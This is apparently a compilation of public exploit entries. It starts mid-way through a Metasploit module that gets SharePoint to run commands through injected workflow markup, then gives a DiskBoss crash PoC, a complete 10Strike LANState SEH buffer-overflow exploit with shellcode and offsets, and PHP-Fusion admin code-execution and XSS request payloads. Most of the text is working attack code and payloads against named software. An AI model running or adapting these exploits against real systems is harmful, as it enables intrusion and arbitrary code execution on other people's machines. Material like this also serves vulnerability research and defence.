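    xml_result = Nokogiri::XML(result)
    xml_result.xpath('//CompilerError/@Text')
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      # Reuse the 'Space' limit declared on the command target for each stager line.
      cmd_target = targets.select { |t| t['Type'] == :windows_command }.first
      execute_cmdstager({ linemax: cmd_target.opts['Space'] })
    when :windows_powershell
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  # Escape +cmd+ for use inside a C# string literal in the generated workflow
  # source: everything outside a small whitelist becomes a \uXXXX escape
  # (\UXXXXXXXX for code points beyond the BMP). The original used
  # `x.unpack('C*')[0]`, i.e. only the first byte of each character, which
  # mangled any non-ASCII input; ASCII output is unchanged.
  def escape_command(cmd)
    cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) do |x|
      cp = x.ord
      cp > 0xffff ? "\\U%.8x" % cp : "\\u%.4x" % cp
    end
  end

  # POST the XOML document that carries +cmd+ to webpartpages.asmx and return
  # the raw response (nil on no response). HttpClient performs the HTTP
  # authentication from the 'username'/'password' keys and datastore DOMAIN.
  # +opts+ is accepted for the CmdStager mixin and ignored.
  def execute_command(cmd, opts = {})
    xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
      <workflowMarkupText>
        <![CDATA[
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
  <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
</SequentialWorkflowActivity>
        ]]>
      </workflowMarkupText>
      <rulesText></rulesText>
      <configBlob></configBlob>
      <flag>2</flag>
    </ValidateWorkflowMarkupAndCreateSupportObjects>
  </soap:Body>
</soap:Envelope>
    EOS

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
      'ctype'    => 'text/xml; charset=utf-8',
      'data'     => xoml_data,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
    unless res&.code == 200
      print_error('Non-200 HTTP response received while trying to execute the command')
    end
    res
  end
end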
-
DiskBoss 7.7.14 - Denial of Service (PoC)
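# Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC)
# Date: 2020-04-01
# Exploit Author: Paras Bhatia
# Vendor Homepage: https://www.diskboss.com/
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Steps to Produce the Crash:
# 1.- Run python code: DiskbossCrash.py
# 2.- Copy content to clipboard
# 3.- Open "diskboss.exe" (diskbsg.exe)
# 4.- Go to "Command" > Search Files
# 5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
# 6.- Click on " Add Input Directory"
# 7.- Paste ClipBoard into the "Directory" field
# 8.- Click on OK
# 9.- Crashed

# Python "DiskbossCrash.py" Code:

# Crash trigger: 7000 'A' characters pasted into the "Directory" field.
# This PoC demonstrates a local crash only; nothing here establishes control
# of the faulting address, so treat it as a DoS, not as exploitable, until
# the crash has been analysed in a debugger.
buffer = "\x41" * 7000

# `with` closes the handle even if the write raises; the original left it
# open on error.
with open("DiskbossCrash.txt", "w") as f:
    f.write(buffer)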
-
10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
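# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
# Date: 2020-04-01
# Exploit Author: Hodorsec
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Vendor Homepage: https://www.freecommander.com
#   NOTE(review): the homepage above looks like a copy-paste leftover; the
#   software link points at 10-strike.com.
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List".
#   Entering an overly long string results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results

# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# 41414141 ??              ???

#!/usr/bin/python
# Builds the SEH-overwrite payload as a text file to paste into LANState.
# All buffers are bytes literals so the script behaves the same under
# Python 2 and Python 3 (the original was Python 2 only).
import struct
import sys

# Filename
filename = "10_strike_lanstate-poc.txt"

# Maximum length
maxlen = 10000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
#
# NOTE(review): the first bytes below (\xdb\xdc\xd9\x74\x24\xf4 ...) are the
# encoder's GetPC stub and are NOT alphanumeric - several are above \x7f.
# If bytes above \x7f are really bad in this input path, generate the
# payload with BufferRegister=<reg> so alpha_mixed omits that stub; the
# author reports this build working, so the bad-char assumption is unverified.
shellcode = (
    b"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
    b"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    b"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
    b"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
    b"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
    b"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
    b"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
    b"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
    b"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
    b"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
    b"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
    b"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
    b"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
    b"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
    b"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
    b"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
    b"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
    b"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
    b"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
    b"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
    b"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
    b"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
    b"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
    b"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
    b"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
    b"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
    b"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
    b"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
    b"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
)

# Offsets (from the crash analysis on the tested build; other builds will differ)
crash_ebp = 228          # bytes until EBP is overwritten (informational)
crash_nseh = 236         # bytes until the next-SEH pointer
crash_seh = crash_nseh + 4  # SEH handler pointer follows immediately

# Variables
nops = b"\x90" * 16  # Nops

# Prefix
prefix = b"A" * crash_nseh  # Filler
nseh = b"\x71\x06\x70\x04"  # JNO +6 / JO +4: whichever branch is taken jumps over NSEH/SEH
seh = struct.pack("<L", 0x0132730f)  # call dword ptr ss:[ebp-04]  # [LANState.exe]
suffix = nops       # Old-school NOP'ing
suffix += shellcode  # Magic!

# Pad to maxlen. The original computed the padding with no sign check, so a
# shellcode longer than the available room would silently produce a short
# (and useless) file; fail loudly instead.
filler_len = maxlen - len(prefix + nseh + seh + suffix)
if filler_len < 0:
    sys.exit("[!] Payload exceeds maxlen by %d bytes, adjust maxlen or shellcode" % -filler_len)
suffix += b"D" * filler_len  # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix

# Put it all together. Only I/O errors are caught (the original bare except
# also hid programming errors and exited with status 0 on failure).
try:
    with open(filename, "wb") as fh:
        fh.write(payload)
    print("[+] File " + filename + " with size " + str(len(payload)) + " created successfully")
except (IOError, OSError) as exc:
    print("[!] Error creating file: " + str(exc))
    sys.exit(1)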
-
PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution
# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerabilities
# Google Dork: N/A
# Date: 2020-04-01
# Exploit Author: Unkn0wn
# Vendor Homepage: https://www.php-fusion.co.uk
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: 9.03.50
# Tested on: Ubuntu
# CVE : N/A

---------------------------------------------------------
Code Execution:

The vulnerability is in the "add_panel_form()" function of administration/panels.php. At line 527 the posted panel content is passed straight to "eval":

* eval("?>".stripslashes($_POST['panel_content'])."<?php ");

* and lines 528 - 530 of the same function return the output of that evaluation to us:

* $eval = ob_get_contents(); ob_end_clean(); echo $eval;

Note: both requests below go to the administration area and carry the admin session id (aid) and a valid fusion_token, so this requires an already-authenticated administrator session. It is admin-to-code-execution, not an authentication bypass; its impact is that any admin (or stolen admin session/CSRF-equivalent token) gets arbitrary PHP execution on the web server.

* Demo:

http://localhost/PHP-Fusion/files/administration/panels.php?aid=ae28e84e22e900fb&section=panelform&action=edit&panel_id=4

POST DATA:

fusion_token=1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583cf191c7dd30c2d99e9&form_id=panel_form&fusion_PmbaJ2=&panel_id=4&panel_name=Welcome Message&panel_filename=none&panel_side=2&panel_restriction=2&panel_url_list=&panel_display=0&panel_content-insertimage=&panel_content=;"Code Execution Payload"&panel_access=0&panel_languages[]=English&panel_save=Preview Panel

----------------------------
Cross-site scripting:

At line 532 the same POST parameter, panel_content, is printed back into the page:

" echo "<p>".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."</p>\n"; "

Demo:

http://localhost/PHP-Fusion/files/administration/panels.php?aid=ae28e84e22e900fb&section=panelform&action=edit&panel_id=4

POST DATA:

fusion_token=1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583cf191c7dd30c2d99e9&form_id=panel_form&fusion_PmbaJ2=&panel_id=4&panel_name=Welcome Message&panel_filename=none&panel_side=2&panel_restriction=2&panel_url_list=&panel_display=0&panel_content-insertimage=&panel_content=;"<script>alert('Unkn0wn')</script>"&panel_access=0&panel_languages[]=English&panel_save=Preview Panel

----------------------------------------------------------
# Contact : [email protected]
# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher